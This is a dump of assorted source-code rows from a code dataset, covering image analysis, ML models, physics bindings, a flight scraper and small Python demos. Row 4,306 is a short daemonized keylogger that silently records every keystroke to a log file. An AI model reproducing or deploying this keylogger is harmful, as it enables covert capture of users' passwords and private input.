index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
4,300 | 7d3264e9a90ebd72439f77983cbf4f9755048a85 | import requests,cv2,numpy,time,imutils
class imageAnalyzer():
def __init__(self,
roverName="Rover03",
url="http://192.168.1.10:5000/api/",
temp_img_path = "./temp",
):
self.url = url + roverName
self.temp_img_path = temp_img_path
def getImage(self,img_number): # gets image from camera and saves it as temp(img_number).jpeg
temp = open(self.temp_img_path + str(img_number) + ".jpeg", "wb")
img = requests.get(self.url + "/image")
temp.write(img.content)
temp.close()
def analyzeHSV(self,img_number,thresholds=(numpy.array([20,100,110]),numpy.array([40,255,255]))): # min, max, creates mask from HSV thresholds
img = cv2.imread(self.temp_img_path + str(img_number) + ".jpeg")
orig = numpy.copy(img)
try:
img = cv2.GaussianBlur(img,(7,7),8)
except:
pass
hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
ret = cv2.inRange(hsv, thresholds[0],thresholds[1])
return ret,orig
def findBoundingBoxes(self,img,orig=None,area_thresh=100,aspect_thresh=[0.8,1.0],y_threshold=[0,0.6]): # finds contours from mask and determines bound boxes, vetoes by minimum box area, aspect ratio and vertical screen portion
con = cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
con = imutils.grab_contours(con)
if orig.any():
cv2.drawContours(orig, con, -1, (255, 255, 255),thickness=2)
bound = []
for c in con:
bound.append(cv2.boundingRect(c))
bound = list(filter(lambda x: (x[2]*x[3] >= area_thresh) and (aspect_thresh[0] <= x[3]/x[2] <= aspect_thresh[1]) and 480*y_threshold[0] <= 480-x[1] <= 480*y_threshold[1], bound)) # vetoing based on minimal bounding box area, relative position in image and aspect ratio
for b in bound:
cv2.rectangle(orig,b,color=(0,0,255),thickness=2)
cv2.imwrite("vis{}.jpg".format(0),orig)
return bound
def approx_distance(self,duckie_boxes,dist_half_screen=5,camera_y_res=480): # bounding boxes of ducks, calibration: distance in cm from camera to center of duck for duck to take up half of camera image height assuming duck size = const.
distances = {}
print(duckie_boxes)
for box in duckie_boxes:
distances[box] = round(dist_half_screen*(1/2)*(camera_y_res/box[3]))
distances = [ (box, round(dist_half_screen*(1/2)*(camera_y_res/box[3]) ) ) for box in duckie_boxes] # NOTE: Y coordinate origin is from the top of the image, returns list of (rect=(x_anchor,y_anchor,x_size,y_size),distance) tuple-value pairs (note,y_size goes downwards!)
return distances
def capture(self,temp_image=0,db_file="temp_duck_boxes.txt"): # gets image, returns bounding boxes and distances according to NOTE, creates temp images temp(n) and vis(n) with n = temp_image argument as well as distance text file
self.getImage(temp_image)
ret = self.analyzeHSV(temp_image)
boxes = self.findBoundingBoxes(ret[0], ret[1])
duck_box_file = open(db_file, "w")
dist = analyzer.approx_distance(boxes)
duck_box_file.write(str(dist))
duck_box_file.close()
return boxes, dist
analyzer = imageAnalyzer()
while True:
boxes, dist = analyzer.capture()
time.sleep(0.5)
|
4,301 | b6e4214ace89165f6cfde9f2b97fcee8be81f2ed | # coding=utf-8
# Copyright 2019 SK T-Brain Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from kobert import download
def get_onnx_kobert_model(cachedir=".cache"):
"""Get KoBERT ONNX file path after downloading"""
onnx_kobert = {
"url": "s3://skt-lsl-nlp-model/KoBERT/models/kobert.onnx1.8.0.onnx",
"chksum": "6f6610f2e3b61da6de8dbce",
}
model_info = onnx_kobert
model_path, is_cached = download(
model_info["url"], model_info["chksum"], cachedir=cachedir
)
return model_path
def make_dummy_input(max_seq_len):
def do_pad(x, max_seq_len, pad_id):
return [_x + [pad_id] * (max_seq_len - len(_x)) for _x in x]
input_ids = do_pad([[31, 51, 99], [15, 5]], max_seq_len, pad_id=1)
token_type_ids = do_pad([[0, 0, 0], [0, 0]], max_seq_len, pad_id=0)
input_mask = do_pad([[1, 1, 1], [1, 1]], max_seq_len, pad_id=0)
position_ids = list(range(max_seq_len))
return (input_ids, token_type_ids, input_mask, position_ids)
if __name__ == "__main__":
import onnxruntime
import numpy as np
from kobert import get_onnx_kobert_model
onnx_path = get_onnx_kobert_model()
dummy_input = make_dummy_input(max_seq_len=512)
so = onnxruntime.SessionOptions()
sess = onnxruntime.InferenceSession(onnx_path)
outputs = sess.run(
None,
{
"input_ids": np.array(dummy_input[0]),
"token_type_ids": np.array(dummy_input[1]),
"input_mask": np.array(dummy_input[2]),
"position_ids": np.array(dummy_input[3]),
},
)
print(outputs[-2][0])
|
4,302 | d0e5cfc7b619c2eaec19248619d7d59e41503c89 | a=[i for i in range(10)]
del a[0]
print a
del a[-1]
print a
del a[1]
print a
del a[0:2]
print a
del a[1:3:1]
print a
#test del all
del a[:]
print a
a.append(1)
print a
# Make sure that del's work correctly in sub-scopes:
x = 1
def f1():
x = range(5)
def f2():
del x[1]
return f2
f1()()
|
4,303 | 90d792fe18e589a0d74d36797b46c6ac1d7946be | # The purpose of this module is essentially to subclass the basic SWIG generated
# pynewton classes and add a bit of functionality to them (mostly callback related
# stuff). This could be done in the SWIG interface file, but it's easier to do it
# here since it makes adding python-specific extensions to newton easier.
import pynewton
try:
import OpenGL.GL as GL
import OpenGL.GLU as GLU
GLPresent = True
except:
GLPresent = False
def GetEulerAngle ( matrix ):
return pynewton.GetEulerAngle( matrix )
def SetEulerAngle ( angle ):
return pynewton.SetEulerAngle( angle )
#extensions to body
def NullApplyForceAndTorqueCallback( body ) :
pass
def NullTransformCallback( body, matrix ):
pass
def NullAutoactiveCallback( body, state ):
pass
def NullBodyDestructCallback( body ):
pass
class Body( pynewton.Body ):
def __init__( self, world, cg ):
self.ApplyForceAndTorqueCallback = None
self.TransformCallback = None
self.AutoactiveCallback = None
self.DestructorCallback = None
self.TreeCollisionCallback = None
pynewton.Body.__init__(self, world, cg )
world.RegisterBody( self )
self.py_cg = cg;
def SetApplyForceAndTorqueCallback( self, callback ):
self.ApplyForceAndTorqueCallback = callback
def SetAutoactiveCallback( self, callback ):
self.AutoactiveCallback = callback
def GetCollision( self ):
return self.py_cg
def OnApplyForceAndTorque(self):
if self.ApplyForceAndTorqueCallback != None:
self.ApplyForceAndTorqueCallback( self )
def OnAutoactive(self, state ):
if self.AutoactiveCallback != None:
self.AutoactiveCallback( self, state )
def OnTransform( self ):
matrix = self.GetMatrix()
if self.TransformCallback != None:
self.TransformCallback( self, matrix )
def OnDestruct( self ):
if self.DestructorCallback != None:
self.DestructorCallback( self, matrix )
def OnTreeCollisionWith( self, body ):
if self.TreeCollisionCallback != None:
self.TreeCollisionCallback(body)
def Draw( self ):
m = self.GetMatrix()
if not GLPresent: raise "OpenGL module not loaded, cannot draw"
GL.glPushMatrix()
GL.glMultMatrixf( m )
c = self.GetCollision()
c.draw()
GL.glPopMatrix()
class _materialCallback( object ):
def __init__(self, id1, id2, begin_function, process_function, end_function, userobject):
self.id1 = id1
self.id2 = id2
self.beginCallback = begin_function
self.processCallback = process_function
self.endCallback = end_function
self.userobject = userobject
#extensions to world
class World( pynewton.World ):
def __init__(self ):
self.bodyList = []
self.newtonBodyLookup = {}
self.materialCallbacks = {}
self.currentCallback = None
self.raycastUserData = None
self.raycastCallback = None
pynewton.World.__init__(self)
def RegisterBody( self, body ):
self.bodyList.append( body )
self.newtonBodyLookup[body.IDKey()] = body
def UnregisterBody( self, body ):
self.bodyList.remove( bodyList.index(body) )
del self.newtonBodyLookup[body.m_body]
def NewtonBodyToBody( self, ptr ):
return self.newtonBodyLookup[int(ptr)]
def ForEachBodyDo( self, function ):
for body in self.bodyList:
function( body )
def RayCast( self, p0, p1, callback, userdata):
"""Casts a ray in the world defined by p0 and p1 and calls callback
with the body, normal, collision id, user data and intersection distance"""
self.raycastUserData = userdata
self.raycastCallback = callback
self.CppRayCast.__call__(p0[0], p0[1], p0[2], p1[0], p1[1], p1[2])
def RayCastCallback( self, body, nx, ny, nz, collisionID, intersectParam ):
#delegate this off to the user specified function
return self.raycastCallback( body, (nx, ny, nz), collisionID, self.raycastUserData, intersectParam )
def MaterialSetCollisionCallback( self, id1, id2, userdata=None, begin_func=None, process_func=None, end_func=None ):
self.materialCallbacks[(id1,id2)] = _materialCallback( id1, id2, begin_func, process_func, end_func, userdata)
self.RegisterMaterialCallbackBetween( id1, id2)
def GetMaterialCallback(self, material, body1, body2):
id1 = body1.MaterialGroupID()
id2 = body2.MaterialGroupID()
cb = self.materialCallbacks[(id1,id2)]
return cb
def MaterialBeginCollision( self, material, b1, b2 ):
body1 = self.newtonBodyLookup[int(b1)]
body2 = self.newtonBodyLookup[int(b2)]
self.currentCallback = self.GetMaterialCallback( material, body1, body2 )
if self.currentCallback.beginCallback:
self.currentCallback.beginCallback(material,
body1,
body2,
self.currentCallback.userobject )
def MaterialProcessCollision( self, material, contactHandle ):
if self.currentCallback.processCallback:
self.currentCallback.processCallback(material,
contactHandle,
self.currentCallback.userobject )
def MaterialEndCollision( self, material ):
if self.currentCallback.endCallback:
self.currentCallback.endCallback( material,
self.currentCallback.userobject )
#collision extensions
class CollisionGeometry( pynewton.CollisionGeometry ):
def draw(self):
if not GlPresent: raise "OpenGL module could not be loaded"
class Sphere ( pynewton.Sphere ):
def __init__(self, world, w, h, d, offset_matrix=None):
pynewton.Sphere.__init__( self, world, w, h, d, offset_matrix )
self.width = w
self.height = h
self.depth = d
if GLPresent:
self.quad = GLU.gluNewQuadric()
def draw(self):
if not GLPresent: raise "OpenGL module could not be loaded"
GL.glPushMatrix()
GL.glScalef( self.width, self.height, self.depth )
GL.glPolygonMode( GL.GL_FRONT_AND_BACK, GL.GL_LINE )
GLU.gluSphere( self.quad, 1.0, 12, 12 )
GL.glPolygonMode( GL.GL_FRONT_AND_BACK, GL.GL_FILL )
GL.glPopMatrix()
class Box ( pynewton.Box ):
pass
class Cone ( pynewton.Cone ):
pass
class Cylinder (pynewton.Cylinder):
pass
class ChamferCylinder (pynewton.ChamferCylinder):
pass
class ConvexHull (pynewton.ConvexHull):
pass
class ConvexHullModifier (pynewton.ConvexHullModifier):
pass
class NullCollider (pynewton.NullCollider ):
pass
class TreeCollision (pynewton.TreeCollision):
pass
class TreeCollisionUserCallback ( pynewton.TreeCollisionUserCallback ):
def __init__( self, func ):
self.callbackFunc = func
def OnCallback (self, bodyWithTreeCollision, body, vertices, vertexstrideInBytes, indexCount, indexArray):
if self.callbackFunc != None:
self.callbackFunc( bodyWithTreeCollision, body, vertices, vertexstrideInBytes, indexCount, indexArray)
pass
#material extensions
class Material ( pynewton.Material ):
pass
#joint extensions
class BallJoint ( pynewton.BallJoint ):
def __init__(self, *args, **kwargs ):
self.callback = None
return pynewton.BallJoint.__init__(self, *args, **kwargs )
def OnCallback():
if self.callback != None:
self.callback( )
pass
class Hinge ( pynewton.Hinge ):
def __init__(self, *args, **kwargs ):
self.callback = None
return pynewton.Hinge.__init__( *args, **kwargs )
def OnCallback( desc ):
if self.callback != None:
return self.callback( desc )
return 0
class Slider ( pynewton.Slider ):
def __init__( self, *args, **kwargs ):
self.callback = None
return pynewton.Slider.__init__( self, *args, **kwargs )
# def OnCallback( desc ):
# if self.callback != None:
# return self.callback( desc )
# return 0
class Corkscrew ( pynewton.Corkscrew ):
def __init__(self, *args, **kwargs ):
self.callback = None
pynewton.Corkscrew.__init__(self, *args, **kwargs )
def OnCallback( desc ):
if self.callback != None:
return self.callback( desc )
return 0
class UniversalJoint ( pynewton.UniversalJoint ):
def __init__(self, *args, **kwargs ):
self.callback = None
return pynewton.UniversalJoint.__init__( self, *args, **kwargs )
def OnCallback( desc ):
if self.callback != None:
return self.callback( desc )
return 0
class UpVector ( pynewton.UpVector ):
def __init__(self, *args, **kwargs ):
self.callback = None
return pynewton.UpVector.__init__(self, *args, **kwargs )
def OnCallback():
if self.callback != None:
self.callback( )
class Tire ( pynewton.Tire ):
pass
class Vehicle ( pynewton.Vehicle ):
def __init__(self, *args, **kwargs ):
self.tires = []
self.UpdateTireCallback = None
return pynewton.Vehicle.__init__(self, *args, **kwargs )
def AddTire ( self, matrix, pin, mass, width, radius, suspensionShock, suspensionSpring, suspensionLength, userData, collisionID):
tire = pynewton.Vehicle.AddTire(self, matrix, pin, mass, width, radius, suspensionShock, suspensionSpring, suspensionLength, userData, collisionID)
tires.append( tire )
return tire
def RemoveTire( self, tire ):
del tires[tires.index(tire)]
tire = pynewton.Vehicle.RemoveTire( self, tire )
def OnCallback( self):
if self.UpdateTireCallback != None:
self.UpdateTireCallback(self)
#Heightmap
class HeightField ( pynewton.HeightField ):
pass
|
4,304 | a727502063bd0cd959fdde201832d37b29b4db70 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-10 11:06
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('album', '0013_auto_20160210_1609'),
]
operations = [
migrations.CreateModel(
name='Albumname',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('album_text', models.CharField(blank=True, max_length=1000, null=True)),
('album_no', models.IntegerField(blank=True, null=True)),
('lineup', models.ManyToManyField(to='album.Shilpi')),
('prokashok', models.ManyToManyField(to='album.Prokashok')),
],
),
]
|
4,305 | 1ed7dba63db38e53a1dc5fac3c36f0dd98075c1f | from datetime import *
import datetime
import time
time_one = datetime.time(1, 2, 3)
print("Time One :: ", time_one)
time_two = datetime.time(hour=23, minute=59, second=59, microsecond=99)
print("Time Two :: ", time_two)
date_one = datetime.date(month=3, year=2019, day=31)
print("Date One :: ", date_one)
today = datetime.date.today()
print("Today :: ", today, today.timetuple())
print("Difference Between Time :: ", timedelta(time_two.second) - timedelta(time_one.second))
print("Today :: ", datetime.date.today())
print("Time.asctime() :: ", time.asctime())
now = time.gmtime()
print("time.asctime(time.gmtime) :: ", time.asctime(now))
start = time.time()
time.sleep(3)
stop = time.time()
print(stop - start) |
4,306 | 3dc2d9a5e37ce1f546c0478de5a0bb777238ad00 | from pynput.keyboard import Listener
import logging
import daemon
import socket
import thread
logging.basicConfig(format="%(asctime)s:%(message)s")
file_logger = logging.FileHandler("/home/user0308/logger.log", "a")
logger = logging.getLogger()
logger.addHandler(file_logger)
logger.setLevel(logging.DEBUG)
def press(key):
logging.info(key)
def work():
with Listener(on_press = press) as listener:
listener.join()
with daemon.DaemonContext(files_preserve=[file_logger.stream.fileno()]):
work()
|
4,307 | 18aafb71d7e6f5caa2f282126c31eb052c08ad3c | import errno
import os
import shutil
from calendar import monthrange
from datetime import datetime, timedelta
from pavilion import output
from pavilion import commands
from pavilion.status_file import STATES
from pavilion.test_run import TestRun, TestRunError, TestRunNotFoundError
class CleanCommand(commands.Command):
"""Cleans outdated test and series run directories."""
def __init__(self):
super().__init__(
'clean',
'Clean up Pavilion working directory.',
short_help="Clean up Pavilion working diretory."
)
def _setup_arguments(self, parser):
parser.add_argument(
'-v', '--verbose', action='store_true', default=False,
help='Verbose output.'
)
parser.add_argument(
'--older-than', nargs='+', action='store',
help='Set the max age of files to be removed. Can be a date ex:'
'"Jan 1 2019" or , or a number of days/weeks ex:"32 weeks"'
)
def run(self, pav_cfg, args):
"""Run this command."""
if args.older_than:
if 'day' in args.older_than or 'days' in args.older_than:
cutoff_date = datetime.today() - timedelta(
days=int(args.older_than[0]))
elif 'week' in args.older_than or 'weeks' in args.older_than:
cutoff_date = datetime.today() - timedelta(
weeks=int(args.older_than[0]))
elif 'month' in args.older_than or 'months' in args.older_than:
cutoff_date = get_month_delta(int(args.older_than[0]))
else:
date = ' '.join(args.older_than)
try:
cutoff_date = datetime.strptime(date, '%b %d %Y')
except (TypeError, ValueError):
output.fprint("{} is not a valid date."
.format(args.older_than),
file=self.errfile, color=output.RED)
return errno.EINVAL
# No cutoff specified, removes everything.
else:
cutoff_date = datetime.today()
tests_dir = pav_cfg.working_dir / 'test_runs'
series_dir = pav_cfg.working_dir / 'series'
download_dir = pav_cfg.working_dir / 'downloads'
build_dir = pav_cfg.working_dir / 'builds'
dependent_builds = []
incomplete_tests = []
# Clean Tests
output.fprint("Removing Tests...", file=self.outfile,
color=output.GREEN)
for test in os.listdir(tests_dir.as_posix()):
test_time = datetime.fromtimestamp(
os.path.getmtime((tests_dir / test).as_posix()))
try:
test_obj = TestRun.load(pav_cfg, int(test))
status = test_obj.status.current().state
except (TestRunError, TestRunNotFoundError):
output.fprint("Removing bad test directory {}".format(test),
file=self.outfile)
shutil.rmtree(tests_dir.as_posix())
continue
except PermissionError as err:
err = str(err).split("'")
output.fprint("Permission Error: {} cannot be removed"
.format(err[1]), file=self.errfile, color=31)
if test_time < cutoff_date and status != STATES.RUNNING \
and status != STATES.SCHEDULED:
shutil.rmtree((tests_dir / test).as_posix())
if args.verbose:
output.fprint("Removed test {}".format(test),
file=self.outfile)
else:
if args.verbose:
output.fprint("Skipped test {}".format(test),
file=self.outfile)
incomplete_tests.append(test)
dependent_builds.append(test_obj.build_name)
# Clean Series
completed_series = True
output.fprint("Removing Series...", file=self.outfile,
color=output.GREEN)
for series in os.listdir(series_dir.as_posix()):
try:
series_time = datetime.fromtimestamp(
os.path.getmtime((series_dir / series).as_posix()))
for test in incomplete_tests:
if os.path.exists((series_dir / series / test).as_posix()):
completed_series = False
if series_time < cutoff_date and completed_series:
shutil.rmtree((series_dir / series).as_posix())
if args.verbose:
output.fprint("Removed series {}".format(series),
file=self.outfile)
else:
if args.verbose:
output.fprint("Skipped series {}".format(series),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint("Permission Error: {} cannot be removed"
.format(err[1]), file=self.errfile, color=31)
# Clean Downloads
output.fprint("Removing Downloads...", file=self.outfile,
color=output.GREEN)
for download in os.listdir(download_dir.as_posix()):
try:
download_time = datetime.fromtimestamp(
os.path.getmtime((download_dir / download).as_posix()))
if download_time < cutoff_date:
try:
shutil.rmtree((download_dir / download).as_posix())
except NotADirectoryError:
output.fprint("{} is not a directory.".format(download),
file=self.errfile, color=output.RED)
os.remove((download_dir / download).as_posix())
if args.verbose:
output.fprint("Removed download {}".format(download),
file=self.outfile)
else:
if args.verbose:
output.fprint("Skipped download {}".format(download),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint("Permission Error: {} cannot be removed"
.format(err[1]), file=self.errfile, color=31)
# Clean Builds
output.fprint("Removing Builds...", file=self.outfile,
color=output.GREEN)
for build in os.listdir(build_dir.as_posix()):
try:
build_time = datetime.fromtimestamp(
os.path.getmtime((build_dir / build).as_posix()))
if build_time < cutoff_date and build not in dependent_builds:
shutil.rmtree((build_dir / build).as_posix())
if args.verbose:
output.fprint("Removed build {}".format(build),
file=self.outfile)
else:
if args.verbose:
output.fprint("Skipped build {}".format(build),
file=self.outfile)
except PermissionError as err:
err = str(err).split("'")
output.fprint("Permission Error: {} cannot be removed. "
.format(err[1]), file=self.errfile, color=31)
return 0
def get_month_delta(months):
"""Turn a number of months in the future into a concrete date."""
today = datetime.today()
cur_year = today.year
cur_day = today.day
cur_month = today.month
cur_time = today.time
if cur_month - months <= 0:
cut_month = (cur_month - months) % 12
diff_years = (cur_month - months) // 12
cut_year = cur_year + diff_years
else:
cut_month = cur_month - months
cut_year = cur_year
try:
cutoff_date = datetime(cut_year, cut_month, cur_day, cur_time)
except ValueError:
last_day = monthrange(cut_year, cut_month)[1]
cutoff_date = datetime(cut_year, cut_month, last_day, cur_time)
return cutoff_date
|
4,308 | c9de51ee5a9955f36ecd9f5d92813821fb68fb3d | import argparse
import os
import shutil
import time, math
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
import numpy as np
import torch.utils.model_zoo as model_zoo
from torch.autograd.variable import Variable
from .Resnets import *
import torch.nn.functional as F
from torch.autograd import Variable
from efficientnet_pytorch import EfficientNet as efn
class ChannelAttention(nn.Module):
def __init__(self, in_planes, ratio=16):
super(ChannelAttention, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.max_pool = nn.AdaptiveMaxPool2d(1)
self.fc = nn.Sequential(nn.Conv2d(in_planes, in_planes // 16, 1, bias=False),
nn.ReLU(inplace=True),
nn.Conv2d(in_planes // 16, in_planes, 1, bias=False))
#self.fc = nn.Sequential(nn.Linear(in_planes, in_planes // 16, bias=False),
# nn.ReLU(inplace=True),
# nn.Linear(in_planes // 16, in_planes, bias=False))
self.sigmoid = nn.Sigmoid()
def forward(self, x):
#b, c, _, _ = x.size()
avg_out = self.fc(self.avg_pool(x))
max_out = self.fc(self.max_pool(x))
out = avg_out + max_out
return self.sigmoid(out)
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size//2, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = torch.mean(x, dim=1, keepdim=True)
max_out, _ = torch.max(x, dim=1, keepdim=True)
x = torch.cat([avg_out, max_out], dim=1)
x = self.conv1(x)
return self.sigmoid(x)
class PYRModule(nn.Module):
def __init__(self,inplanes,downsample=None):
super(PYRModule, self).__init__()
self.ca = ChannelAttention(inplanes)
self.features = nn.Sequential(
nn.AdaptiveAvgPool2d((1, 1)),
)
def forward(self, x):
#residual =x
x = self.ca(x) * x
#x += residual
x = self.features(x)
return x
class HPNet(nn.Module):
def __init__(self):
super(HPNet, self).__init__()
self.faceModel = efn.from_pretrained('efficientnet-b4')
self.planes_num=1792#2304#2048#1536#1408#1280#1792
self.cls_num=66
self.feature_1 = PYRModule(self.planes_num)
self.feature_2 = PYRModule(self.planes_num)
self.feature_3 = PYRModule(self.planes_num)
self.idx_tensor = torch.FloatTensor(torch.range(0,self.cls_num-1)*1).cuda()
self.fc_b_1 = nn.Sequential(
nn.Linear(self.planes_num, self.cls_num),
)
self.fc_b_2 = nn.Sequential(
nn.Linear(self.planes_num, self.cls_num),
)
self.fc_b_3 = nn.Sequential(
nn.Linear(self.planes_num, self.cls_num),
)
self.max_pool_1=nn.MaxPool1d(3)
self.max_pool_2=nn.MaxPool1d(3)
self.max_pool_3=nn.MaxPool1d(3)
self.softmax=nn.Softmax(dim=2).cuda()
self.sigmoid=nn.Sigmoid().cuda()
def forward(self, faces):
xFace = self.faceModel.extract_features(faces)
x_p = self.feature_1(xFace)
x_y = self.feature_2(xFace)
x_r = self.feature_3(xFace)
x_p = torch.flatten(x_p, 1)
x_y = torch.flatten(x_y, 1)
x_r = torch.flatten(x_r, 1)
x_p_feat=torch.unsqueeze(x_p,1)
x_y_feat=torch.unsqueeze(x_y,1)
x_r_feat=torch.unsqueeze(x_r,1)
x_feat=torch.cat([x_p_feat,x_y_feat,x_r_feat],1)
x_p_b=self.fc_b_1(x_p)
x_y_b=self.fc_b_2(x_y)
x_r_b=self.fc_b_3(x_r)
x_p_b=torch.unsqueeze(x_p_b,1)
x_y_b=torch.unsqueeze(x_y_b,1)
x_r_b=torch.unsqueeze(x_r_b,1)
x_p_b_mp=self.max_pool_1(x_p_b)
x_y_b_mp=self.max_pool_2(x_y_b)
x_r_b_mp=self.max_pool_3(x_r_b)
x_p_pre=self.softmax(x_p_b)
x_y_pre=self.softmax(x_y_b)
x_r_pre=self.softmax(x_r_b)
x_p=torch.sum(x_p_pre * self.idx_tensor, 2)
x_y=torch.sum(x_y_pre * self.idx_tensor, 2)
x_r=torch.sum(x_r_pre * self.idx_tensor, 2)
return torch.cat([x_p,x_y,x_r],1),torch.cat([x_p_b,x_y_b,x_r_b],1),torch.cat([x_p_b_mp,x_y_b_mp,x_r_b_mp],1),x_feat |
4,309 | e1913c80375e4871119182d0267e9f228818624f | # Obtener en otra lista unicamente números impares:
my_list = [1, 4, 5, 6, 9, 13, 19, 21]
# Vamos a hacer una list comprehension:
lista_impares = [num for num in my_list if num % 2 != 0]
print(my_list)
print(lista_impares)
print('')
# Vamos a usar filter:
lista_pares = list(filter(lambda x: x % 2 == 0 , my_list))
print(my_list)
print(lista_pares)
|
4,310 | 234aad868ea71bbe476b303bcff37221820f1d90 | import os
import time
import json
import click
import click_log
import logging
from flightsio.scraper import FlightScraper
logger = logging.getLogger(__name__)
click_log.basic_config(logger)
@click.group()
def main():
"""
An empty click group, required in order to bundle the other commands.
"""
pass
@main.command(help="""Reads the entire destination list of of the given airport
returns the name of the airport and url associated with it.
Sample usage: fio destinations --from-airport PHX""")
@click.option('--from-airport', '-a', help='The three letter code of the source airport. I.e. PHX')
@click_log.simple_verbosity_option(logger)
def destinations(from_airport):
if not from_airport:
logger.error('Unable to get destinations without an aiport code. Use fio destinations --help')
return
destinations = FlightScraper().get_destinations(from_airport.upper())
logger.info(json.dumps(destinations, indent=4))
@main.command(help="""Reads the entire destination list of of the given airport and crawls
each destination to obtain the list of routes. The output files will
stored in the given folder. Sample usage:
fio all-routes --from-airport PHX --output ./out
""")
@click.option('--from-airport', '-a', help='The three letter code of the source airport. I.e. PHX')
@click.option('--output', '-o', help='The path used to write the parsed routes.', default='./output')
@click_log.simple_verbosity_option(logger)
def all_routes(from_airport, output):
if not from_airport:
logger.error('Unable to get all routes without an aiport code. Use fio all_routes --help')
return
airport = from_airport.upper()
scraper = FlightScraper()
airport_path = os.path.join(output, airport)
logger.info(f'Creating {airport_path}')
os.makedirs(airport_path, exist_ok=True)
for destination, routes in scraper.get_routes(airport):
write_csv(airport_path, destination, routes)
@main.command(help="""Reads the route list between a source airport and a destination airport and
writes the result in the output folder. Sample usage:
fio routes --from-airport PHX --to-airport OKC --output ./out
""")
@click.option('--from-airport', '-a', help='The three letter code of the source airport. I.e. PHX')
@click.option('--to-airport', '-b', help='The three letter code of the destination airport. I.e. OKC')
@click.option('--output', '-o', help='The path used to write the parsed routes.', default='./output')
@click_log.simple_verbosity_option(logger)
def routes(from_airport, to_airport, output):
if not from_airport or not to_airport:
logger.error('Unable to get routes without aiport codes. Use fio routes --help')
return
airport = from_airport.upper()
scraper = FlightScraper()
route_path = os.path.join(output, 'single_routes')
logger.info(f'Creating {route_path}')
os.makedirs(route_path, exist_ok=True)
destination_link = scraper.get_fm_link(from_airport, to_airport)
name, routes = scraper.get_flight_foutes(to_airport, destination_link)
write_csv(route_path, f'{from_airport}_{to_airport}', routes)
def write_csv(path, destination, routes):
if not len(routes):
print(f'{destination} has no routes. Nothing to write.')
return
header = ','.join(routes[0])
with open(os.path.join(path, f'{destination}.csv'), 'w') as f:
f.write(header + '\n')
for route in routes:
row = ','.join((v.strip().replace(',', ' ') for v in route.values()))
f.write(row + '\n')
def write_json(destination_path, flight, routes):
with open(os.path.join(destination_path, f'{flight}.json'), 'w') as f:
f.write(json.dumps(routes, indent=4))
if __name__ == '__main__':
main()
|
4,311 | f1021bfbf11886a01a84033b880d648c3286856b | # -*- coding: utf-8 -*-
#!/usr/bin/env python
from subprocess import call
def query_DB_satellites(outputpath="../data/", user="anonimo", passwd="secreto"):
"""
Queries the multidark database to extract all the haloes in the box within a ID range.
The output is stored as an ascii (CSV) file.
"""
#define the output file
outputfile=outputpath+"milky_way_satellites.csv"
# Build the SQL query
query = "with milky_way_halos as (select * from Bolshoi..BDMW where snapnum=416 and Mvir > 5.0E11 and Mvir < 6.0E11 ) select sub.* from milky_way_halos mwh, Bolshoi..BDMW sub where sub.snapnum = 416 and sub.hostFlag = mwh.bdmId"
# Build the wget command to query the database
website = "http://wget.multidark.org/MyDB?action=doQuery&SQL="
username = user
password = passwd
wget_options=" --content-disposition --cookies=on --keep-session-cookies --save-cookies=cookie.txt --load-cookies=cookie.txt --auth-no-challenge"
wget_options=wget_options+" -O "+outputfile +" "
wget_command="wget --http-user="+username+" --http-passwd="+password+" "+wget_options
command=wget_command + "\""+ website + query+"\""
print ""
print query
print ""
print command
print ""
# execute wget in shell
retcode = call(command,shell=True)
query_DB_satellites(user="x", passwd="x") |
4,312 | 47c5375816ab35e8225e5f3695f7ee2ab5336076 | DEFAULT_SIZE = 512
class DataEncoding:
@staticmethod
def segment_decode(segment):
arr = bytearray(segment)
ack_binary = bytearray([arr[i] for i in range(4)])
tip_binary = bytearray([arr[4]])
len_binary = bytearray([arr[i] for i in (5,6)])
ack = int.from_bytes(ack_binary, byteorder='big', signed=False)
tip = int.from_bytes(tip_binary, byteorder='big', signed=False)
length = int.from_bytes(len_binary, byteorder='big', signed=False)
data = bytearray([arr[i] for i in range(7, 7 + length) if arr[i] != b'\x00'])
return {'ack': ack, 'tip': tip, 'len': length, 'data': data}
# codificare: (segment_number, segment_type, segment_len), segment_data
# creeaza primul pachet, cel care contine numele
@staticmethod
def encode_start(transmitter,nume_fisier):
transmitter.ack = transmitter.ack + 1 # primul ack trimis este 1
segment_number = transmitter.ack.to_bytes(4, byteorder='big', signed=False)
segment_type = b'\x01'
lungime_nume = len(nume_fisier)
segment_len = lungime_nume.to_bytes(2, byteorder='big', signed=False)
segment = segment_number + segment_type + segment_len
for ch in nume_fisier:
segment += (ord(ch).to_bytes(1, byteorder='big', signed=False))
return segment
# creeaza pachetele care contine bitii din fisier
@staticmethod
def encode_data(transmitter,segment_data):
transmitter.ack = transmitter.ack + 1 # primul ack trimis este 1
segment_number = transmitter.ack.to_bytes(4, byteorder='big', signed=False)
segment_type = b'\x02'
segment_len = DEFAULT_SIZE.to_bytes(2, byteorder='big', signed=False)
segment = segment_number + segment_type + segment_len + segment_data
return segment
